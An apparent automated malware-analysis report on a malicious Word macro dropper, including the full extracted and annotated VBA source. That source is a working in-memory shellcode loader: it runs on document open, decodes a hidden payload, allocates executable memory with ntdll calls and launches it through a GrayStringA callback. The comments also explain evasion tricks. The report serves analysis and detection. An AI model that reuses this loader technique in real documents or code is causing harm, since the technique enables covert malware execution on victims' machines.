MALICIOUS
90
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The critical ClamAV detection and the presence of VBA macros indicate a malicious dropper. The Document_Open macro is a common technique for initiating malicious actions as soon as the document is opened. Although the VBA script is heavily obfuscated, its structure suggests it attempts to download and execute a second-stage payload; note, however, that the extracted macro source below contains no network or download call, while its API declarations (NtAllocateVirtualMemory, NtWriteVirtualMemory, GrayStringA) and its byte-decoding routine point to an embedded payload being decoded and executed in-process, so the download hypothesis should be confirmed by dynamic analysis. The extracted URLs are XMP/RDF namespace identifiers from embedded image metadata, not C2 endpoints.
Heuristics 4
-
ClamAV: Doc.Dropper.ZwMacros-6057750-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.ZwMacros-6057750-0
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
End Function Private Sub Document_Open() Dim phryne As Integer -
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13507 bytes |
| SHA-256: 292a3081777ffb38ad4874b0aa08e70da58f8154da9255f9afebb325b3458a6f | | | |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst note: main loader routine, called from Document_Open. It reads an
' encoded blob out of a UserForm control, decodes it (slander.sapling), has
' fingerspelling copy the bytes into executable memory, and then triggers them
' through a Win32 callback (adj = GrayStringA). The many NPer/SYD calls and
' word-concatenation assignments in between are dead code: their results are
' never read anywhere in this routine.
Sub shindig()
Dim iodination As Byte
Dim collinsonia As String
' Page count of this document; only used to pick an item in the form control.
broad = ThisDocument.ComputeStatistics(wdStatisticPages)
' "petrous" is the UserForm module at the end of this listing; "behaviorist" is
' one of its controls (not part of the extracted source). Setting Value and then
' reading SelectedItem suggests a list/combo control - confirm in the form.
petrous.behaviorist.Value = broad + 9
vitiation = "ch" & "essm" & "an"
organizationally = "ac" & "cepted"
Set bathrobe = petrous.behaviorist.SelectedItem
footfault = 9
appliance = 25298
silvex = 187158
tetrasaccharide = NPer(75 / 678, footfault, -34342, silvex, 0)
' The selected item's Name carries the encoded payload; its last 5844
' characters are handed to the custom base64 decoder in module "slander".
caporal = bathrobe.Name
verdure = 5844
seagreen = Right(caporal, verdure)
porthole = slander.sapling(seagreen)
lolly = 3
shenanigan = 196
stercorariidae = 14329
patzer = 257898
patzer = SYD(patzer, stercorariidae, shenanigan, lolly)
vapor = "fr" & "ench" & "horn"
ashore = "departing"
#If Win64 Then
Dim ataxia As Variant
Dim annum As LongPtr
Dim vivify As LongPtr
Dim chimes As Variant
#Else
Dim planetstruck As Integer
Dim vivify As Long
Dim dolmas As Integer
Dim annum As Long
#End If
chiasmus = 0
blague = "luniform"
noli = 4096
gekkonidae = 5
barkantine = 216
indefective = 25683
wearer = 230264
wearer = SYD(wearer, indefective, barkantine, gekkonidae)
earthshaking = "ex" & "acti" & "on"
deprivation = "asia"
basidiomycete = "aer" & "ifict" & "ion"
important = "arescent"
amulet = 6
chirpiness = 352
hydrilla = 33193
discursory = 238962
discursory = SYD(discursory, hydrilla, chirpiness, amulet)
boniness = porthole
purgatorial = "carbuncled"
botanomancy = "outset"
' annum receives the base address of the executable region that
' fingerspelling allocates and fills with the decoded bytes.
annum = fingerspelling(boniness)
plethodontidae = "anapsid"
scatter = "bugbane"
#If Win64 Then
Dim akimbo As Variant
Dim dodge As LongPtr
avibus = "quartet"
embalm = "pensiveness"
Dim shamefulness As LongPtr
' 46 + 26 + 1240 = 1312: offset into the decoded bytes used as the x64 entry point.
charabancs = 46 + 26 + 1240
#Else
involuntarily = "th" & "amnophilus"
capitular = "bearish"
exteriority = "omitted"
Dim dodge As Long
fellows = 12 + 483
Dim shamefulness As Long
' 12 + 483 + 2659 = 3154: the corresponding x86 entry offset.
charabancs = fellows + 2659
#End If
Dim causatives As String
Dim cerous As Long
' dodge = 0, shamefulness = 1 (the arithmetic is just obfuscation).
dodge = 40 - 37 - 3
' Entry point = allocated base + architecture-specific offset.
vivify = annum + charabancs
shamefulness = 22 - 29 + 112 - 104
' adj is User32!GrayStringA, declared with every parameter As Any. Its third
' argument is the API's output callback, so passing vivify there makes the
' Win32 call invoke the decoded bytes. Detection angle: a VBA macro that
' resolves GrayStringA together with Nt*VirtualMemory is a strong indicator.
tombe = adj(shamefulness, shamefulness, vivify, dodge, shamefulness, dodge, dodge, dodge, dodge)
adrenocortical = 98
infinity = 2721
dolmen = 318979
perfective = NPer(84 / 716, adrenocortical, -22874, dolmen, 0)
End Sub
' Walks the open Forms collection and prints each form's name to the
' Immediate window. Not called anywhere in the extracted source - filler
' that pads the module.
Sub IterateOpenForms()
Dim openForm As Form
For Each openForm In Forms
Debug.Print openForm.Name
Next
End Sub
' Analyst note: thin wrapper around nigroporus = ntdll!NtWriteVirtualMemory.
' Argument mapping: adorned -> destination address, abutilon -> source
' buffer, ammotragus -> number of bytes. calced = 30 + 102 - 16 - 117 = -1,
' the current-process pseudo-handle, and cauterization is passed without
' being initialised (0) as the bytes-written out-parameter. fingerspelling
' calls this twice: once as a pointer-sized memory copy, once to copy the
' decoded payload into the executable region. Everything else in the body
' (nakedwood, dryopteris, sm, wonderfully) is dead code, and the function
' never assigns its own return value.
Function hewers(adorned, abutilon, ammotragus)
#If Win64 Then
Dim euphemistically As Integer
Dim palinode As Integer
Dim calced As LongPtr
Dim benzoate As LongPtr
Dim cauterization As LongPtr
Dim autopilot As Integer
Dim acrefoot As LongPtr
Dim breakage As LongPtr
#Else
Dim benzoate As Long
Dim differentiation As Variant
Dim calced As Long
Dim sent As Integer
Dim acrefoot As Long
Dim compense As Long
Dim cauterization As Long
Dim stoneware As Integer
Dim breakage As Long
Dim meagerness As Byte
Dim carapace As Byte
#End If
wonderfully = wonderfully
nakedwood = Fix(51)
' Destination address.
benzoate = adorned
' Byte count.
breakage = ammotragus
wonderfully = "intransmutable"
' Source buffer address.
acrefoot = abutilon
propoxyphene = 84
entete = 31605
uraninite = 229852
dryopteris = NPer(70 / 745, propoxyphene, -8766, uraninite, 1)
sm = asepsis + 469
' -1 = current process handle.
calced = 30 + 102 - 16 - 117
' NtWriteVirtualMemory(-1, destination, source, count, &bytesWritten).
nigroporus ByVal calced, benzoate, acrefoot, breakage, cauterization
sm = Fix(196)
End Function
' Analyst note: auto-run entry point - Word executes this when the document
' is opened (the OLE_VBA_DOCOPEN finding in the report). The only effective
' statement is the call to shindig; the Dim lines, string concatenations and
' the SYD() call are dead code whose results are never read.
Private Sub Document_Open()
Dim phryne As Integer
Dim forepart As Long
mature = "ela" & "stoplast"
canonized = "dev" & "eloped"
' Hand off to the loader routine.
shindig
guet = 7
anatolian = 135
busybody = 45279
patronage = 586252
patronage = SYD(patronage, busybody, anatolian, guet)
End Sub
' Analyst note: allocates executable memory and copies the decoded payload
' into it; returns the region's base address to shindig. kenya is the
' decoded byte string produced by sapling. The NPer/SYD/Rnd calls and the
' choleric/fibula assignments are dead code.
Function fingerspelling(kenya)
Dim bryopsida As Integer
Dim goddaughter As Byte
Dim famous As Byte
Dim adroitly As String
#If Win64 > 0 Then
Dim blandae As Integer
Dim astasia As LongPtr
' 18 - 92 - 87 + 169 = 8: pointer size on x64.
redwood = 18 - 92 - 87 + 169
Dim clamshell As LongPtr
Dim betterment As Variant
Dim recognizable As Long
Dim protective As LongPtr
Dim corgi As Long
#Else
Dim supposed As Integer
Dim astasia As Long
' 75 + 101 - 172 = 4: pointer size on x86.
redwood = 75 + 101 - 172
Dim clamshell As Long
Dim goner As String
Dim protective As Long
Dim tangelo As Integer
Dim myrmecophyte As String
#End If
seychelles = VarPtr(astasia)
' First hewers call: NtWriteVirtualMemory used as a plain memory copy. It
' copies one pointer (redwood bytes) from offset 8 of the Variant kenya -
' where a Variant keeps its data union - into astasia, so astasia becomes
' the address of the decoded bytes.
sinkhole = hewers(seychelles, VarPtr(kenya) + 8, redwood)
' -1 = current process handle.
achoerodus = -1
' Obfuscated constants: clamshell = 0 (let the kernel pick the base address),
' classical = 0 (ZeroBits), protective = 9454 (region size),
' blowtorch = 4096 = MEM_COMMIT, gruntle = 64 = PAGE_EXECUTE_READWRITE.
clamshell = 5 - 7 - 120 + 122
classical = 77 - 36 + 85 - 126
protective = 109 + 9345
blowtorch = 5 - 99 + 4190
gruntle = 64
' ararat = ntdll!NtAllocateVirtualMemory(-1, &clamshell, 0, &protective,
' MEM_COMMIT, PAGE_EXECUTE_READWRITE). clamshell receives the base address.
dichroism = ararat(ByVal achoerodus, clamshell, ByVal classical, protective, ByVal blowtorch, ByVal gruntle)
choleric = fibula
sm = Rnd(436)
' Second hewers call: copy 128 + 4256 = 4384 decoded bytes into the new
' region.
hewers clamshell, astasia, 128 + 4256
fibrocartilage = 3
powdery = 263
pie = 51249
capricorn = 109475
capricorn = SYD(capricorn, pie, powdery, fibrocartilage)
' Return the executable region's base address.
fingerspelling = clamshell
End Function
Attribute VB_Name = "slander"
' Maybe if the stars align, maybe if our worlds collide
' I miss you so much, I miss you so much
' Analyst note: Win32 API imports for module "slander", duplicated for
' 64-bit (PtrSafe) and 32-bit hosts. Only three aliases are referenced
' elsewhere in this listing:
'   ararat     -> ntdll!NtAllocateVirtualMemory (called from fingerspelling)
'   nigroporus -> ntdll!NtWriteVirtualMemory    (called from hewers)
'   adj        -> user32!GrayStringA            (called from shindig; its
'                 third parameter is the API's output callback, declared As Any)
' The remaining declarations (ReadConsoleW, SHChangeNotification_Lock,
' SHGetDesktopFolder, SHGetSettings, PathFileExists) are never called in the
' extracted source and appear to be decoys. Note the trailing space in
' Lib "Ntdll.dll " on both NtWriteVirtualMemory lines: an exact-match rule
' on "Ntdll.dll" would miss them. The original filler comments (song lyrics)
' between the declarations carried no information and have been dropped.
#If Win64 Then
' Decoy - unreferenced.
Public Declare PtrSafe Function boarder Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal excessive As LongPtr,attune As LongPtr,durmast As LongPtr,secretiveness As LongPtr,twoway As LongPtr) As Boolean
' Decoy - unreferenced.
Public Declare PtrSafe Function arctiid Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (fancier As LongPtr, humid As Any,leucine As LongPtr, intercommunion As Any) As Boolean
' Used: callback-based execution primitive (see shindig).
Public Declare PtrSafe Function adj Lib "User32.dll" Alias "GrayStringA" ( ByVal adnate As Any, ByVal selfopinioned As Any, ByVal unwaxed As Any, ByVal needlework As Any, ByVal backstairs As Any, ByVal fore As Any, ByVal oast As Any, ByVal everything As Any, ByVal starry As Any) As Long
' Decoy - unreferenced.
Public Declare PtrSafe Function buchloe Lib "Shell32.dll" Alias "SHGetDesktopFolder" (sarum As LongPtr)
' Decoy - unreferenced.
Public Declare PtrSafe Function dioxide Lib "Shell32.dll" Alias "SHGetSettings" (aye As LongPtr,dekaliter As LongPtr) As LongPtr
' Decoy - unreferenced.
Public Declare PtrSafe Function agastache Lib "Shlwapi.dll" Alias "PathFileExists" (freelance As LongPtr) As LongPtr
' Used: memory write primitive (see hewers). Library name has a trailing space.
Public Declare PtrSafe Function nigroporus Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal sachet As Any, ByVal alstroemeriaceae As Any, ByVal chantey As Any, ByVal excretion As Any, ByVal amorphous As Any) As LongPtr
' Used: executable memory allocation (see fingerspelling). The 4th parameter
' name "denaturedByVal" reads like a dropped space; as written it is ByRef,
' which is what the API's RegionSize argument needs anyway.
Public Declare PtrSafe Function ararat Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (dinnertime As LongPtr, myxomycota As LongPtr, ByVal angler As LongPtr,denaturedByVal As LongPtr, expensiveness As LongPtr, ByVal womanizer As LongPtr) As LongPtr
#Else
' Decoy - unreferenced.
Public Declare Function depletion Lib "Shlwapi.dll" Alias "PathFileExists" (tenet As Long) As Long
' Used: executable memory allocation (32-bit variant).
Public Declare Function ararat Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (mossy As Long, resolve As Long, ByVal glossary As Long, delinquentByVal As Long, chaffinch As Long, ByVal meditatively As Long) As Long
' Used: memory write primitive (32-bit variant). Library name has a trailing space.
Public Declare Function nigroporus Lib "Ntdll.dll " Alias "NtWriteVirtualMemory" (ByVal cobber As Any, ByVal airpipe As Any, ByVal beethoven As Any, ByVal bullfight As Any, ByVal loupe As Any) As Long
' Decoy - unreferenced.
Public Declare Function repicolous Lib "Shell32.dll" Alias "SHGetSettings" (acantholysis As Long, seapiece As Long) As Long
' Decoy - unreferenced.
Public Declare Function clothed Lib "Shell32.dll" Alias "SHGetDesktopFolder" (prandial As Long)
' Decoy - unreferenced.
Public Declare Function nuphar Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (confoundedly As Long, chinks As Any, criminologist As Long, adduction As Any) As Boolean
' Decoy - unreferenced.
Public Declare Function indicated Lib "Kernel32.dll" Alias "ReadConsoleW" (ByVal byzantine As Long, sacrilegiousness As Long, astrantia As Long, manumission As Long, uprise As Long) As Boolean
' Used: callback-based execution primitive (32-bit variant).
Public Declare Function adj Lib "User32.dll" Alias "GrayStringA" (ByVal acidophil As Any, ByVal pachyrhizus As Any, ByVal viscaceae As Any, ByVal controversy As Any, ByVal argufy As Any, ByVal advantage As Any, ByVal philately As Any, ByVal doting As Any, ByVal piaster As Any) As Long
#End If
'
' Maybe if the stars align, maybe if our worlds collide
' Returns the Unicode code point of the first character of its argument.
' Not called anywhere in the extracted source - filler.
Function flared(secretariat)
Dim codePoint
codePoint = AscW(secretariat)
flared = codePoint
End Function
' Word helper: when the selection sits on an end-of-row marker, move it one
' character to the left. Not called anywhere in the extracted source - filler.
Sub wheresel()
Dim atRowEnd As Boolean
atRowEnd = (Selection.Information(wdAtEndOfRowMarker) = True)
If atRowEnd Then
Selection.MoveLeft Unit:=wdCharacter, Count:=1
End If
End Sub
' Obfuscated arithmetic dispatcher used by sapling: the numeric selector
' arm chooses integer division (39), bitwise And (49) or multiplication (57).
' Any other selector leaves the result unassigned (Empty).
Function wuther(undeclared, altorilievo, arm)
If arm = 39 Then
wuther = undeclared \ altorilievo
ElseIf arm = 49 Then
wuther = undeclared And altorilievo
ElseIf arm = 57 Then
wuther = undeclared * altorilievo
End If
End Function
' Analyst note: custom base64 decoder for the payload string that shindig
' pulls out of the form control. Visible steps: (1) convert the string to
' ANSI bytes, (2) add 16 to even-indexed and 15 to odd-indexed bytes
' (northernmost = Sqr(RGB(0, 1, 0)) = Sqr(256) = 16) - presumably undoing a
' per-position shift applied at encode time, (3) map each byte through the
' base64 alphabet table built by cyst, (4) pack four 6-bit values into
' three bytes. Returns the decoded bytes as a String (Byte array assigned
' to a String return). The interleaved NPer/SYD calls and stray
' assignments are dead code.
Function sapling(amusing) As String
Dim novello() As Byte
Dim acidic As String
Dim indispose(63) As Long
Dim due As Long
' Output buffer; only the first ~4384 bytes are ever filled for a
' 5844-character input.
Dim bowel(6965) As Byte
Dim unlaureled As String
Dim squareness(63) As Long
Dim fissibility As Byte
Dim autoplastic(63) As Long
fibula = choleric
Dim characteristic As Long
nakedwood = bruit - 270
Dim anergy As Long
Dim abhenry As Long
wonderfully = fibula
Dim touch As Byte
Dim flatware As Integer
' Write position in bowel.
Dim canonize As Long
' Masks and divisors for unpacking the 24-bit group:
' christmas = 0xFF00, likes = 65536, rhincodon = 256, assiduously = 255,
' acidify = 0xFF0000. pessimal = 4096 (64^2), scrambling = 262144 (64^3),
' pardon = 64 are the per-position weights of the four base64 digits.
christmas = 65280
pessimal = 7 + 4089
Dim gasconading As Integer
Dim articular As Long
Dim ovary As Integer
halocarpus = 73 + 114 - 70 + 257931
cite = 63
likes = 75 + 66 + 52 + 65343
bastardized = 85 + 16514987
rhincodon = 84 + 28 + 67 + 77
assiduously = 43 + 84 + 14 + 114
carboloy = 50 + 97 + 3885
scrambling = 70 + 60 + 262014
acidify = 16711680
pardon = 64
Dim legalism As Variant
garcinia = 101 + 108 - 128 - 81
extenuated = 5843
Dim facially() As Byte
Dim demoniac As Variant
' Input string as ANSI bytes (assumes it holds at least 5844 characters,
' which shindig guarantees with Right(name, 5844)).
facially = VBA.Strings.StrConv(amusing, vbFromUnicode)
Dim acervation As Integer
budorcas = 2
nem = 223
ammoniac = 11441
cheliferous = 553797
cheliferous = SYD(cheliferous, ammoniac, nem, budorcas)
' Last index to process (5844 bytes).
puppyism = 5843
' RGB(0, 1, 0) = 256, so northernmost = 16.
northernmost = Sqr(RGB(0, 1, 0))
' Per-position de-shift: +16 on even indices, +15 on odd ones. A Byte
' overflow would raise here if an input byte exceeded 239/240.
For prismoid = 0 To puppyism
If prismoid Mod 2 = 0 Then
facially(prismoid) = facially(prismoid) + northernmost
Else
facially(prismoid) = facially(prismoid) + northernmost - 1
End If
Next prismoid
disseize = 8
newly = 341
esocidae = 12389
mutter = 521936
mutter = SYD(mutter, esocidae, newly, disseize)
flatware = 0
goldbricking = 84 - 84
motheaten = 43
' Base64 alphabet lookup table (ASCII code -> 6-bit value), see cyst.
subclass = cyst
' indispose(i) = i*64, squareness(i) = i*4096, autoplastic(i) = i*262144
' (wuther selector 57 = multiply).
For abhenry = 0 To 63
indispose(abhenry) = wuther(abhenry, pardon, 57)
squareness(abhenry) = wuther(abhenry, pessimal, 57)
autoplastic(abhenry) = wuther(abhenry, scrambling, 57)
Next abhenry
imitated = 65
continuing = 14966
dorser = 387811
abbreviate = NPer(79 / 589, imitated, -20064, dorser, 1)
novello = facially
diffuse = 4
bodybuilding = 6
apios = 357
leafed = 16129
reagan = 305994
reagan = SYD(reagan, leafed, apios, bodybuilding)
callinectes = 3
nakedwood = Fix(323)
fibula = "monument"
outspread = callinectes + 1
' extenuate = 2: index of the third output byte in each group.
extenuate = 109 - 107
' Decode loop. The body advances characteristic by 3 and Next adds 1, so
' each iteration consumes four input bytes and produces three output bytes.
For characteristic = 0 To puppyism
geotic = novello(characteristic)
counterinsurgency = novello(characteristic + 2)
' 24-bit group: d0*64^3 + d1*64^2 + d2*64 + d3.
due = autoplastic(subclass(geotic)) _
+ squareness(subclass(novello(characteristic + 1))) + indispose(subclass(counterinsurgency)) + subclass(novello(characteristic + callinectes))
' (due And 0xFF0000) \ 65536 -> first byte.
abhenry = wuther(due, acidify, 49)
bowel(canonize) = wuther(abhenry, likes, 39)
' (due And 0xFF00) \ 256 -> second byte.
abhenry = wuther(due, christmas, 49)
bowel(canonize + 1) = wuther(abhenry, rhincodon, 39)
' due And 0xFF -> third byte.
bowel(canonize + extenuate) = wuther(due, assiduously, 49)
canonize = canonize + extenuate + 1
characteristic = characteristic + 3
Next
sapling = bowel
End Function
' Builds the standard base64 reverse-lookup table used by sapling: index is
' the ASCII code of an alphabet character, value is its 6-bit digit
' (A-Z -> 0..25, a-z -> 26..51, 0-9 -> 52..61, '+' -> 62, '/' -> 63); all
' other slots stay 0. Returned as a Variant holding the Byte array.
Function cyst()
Dim table(255) As Byte
Dim code As Long
For code = 65 To 90
table(code) = code - 65
Next code
For code = 48 To 57
table(code) = code + 4
Next code
For code = 97 To 122
table(code) = code - 71
Next code
table(47) = 63
table(43) = 62
cyst = table
End Function
Attribute VB_Name = "petrous"
Attribute VB_Base = "0{251FA6CC-669C-4E05-A4E9-53108C24B81C}{1165EBC0-DA34-44E4-BFA6-C474BC3D9584}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||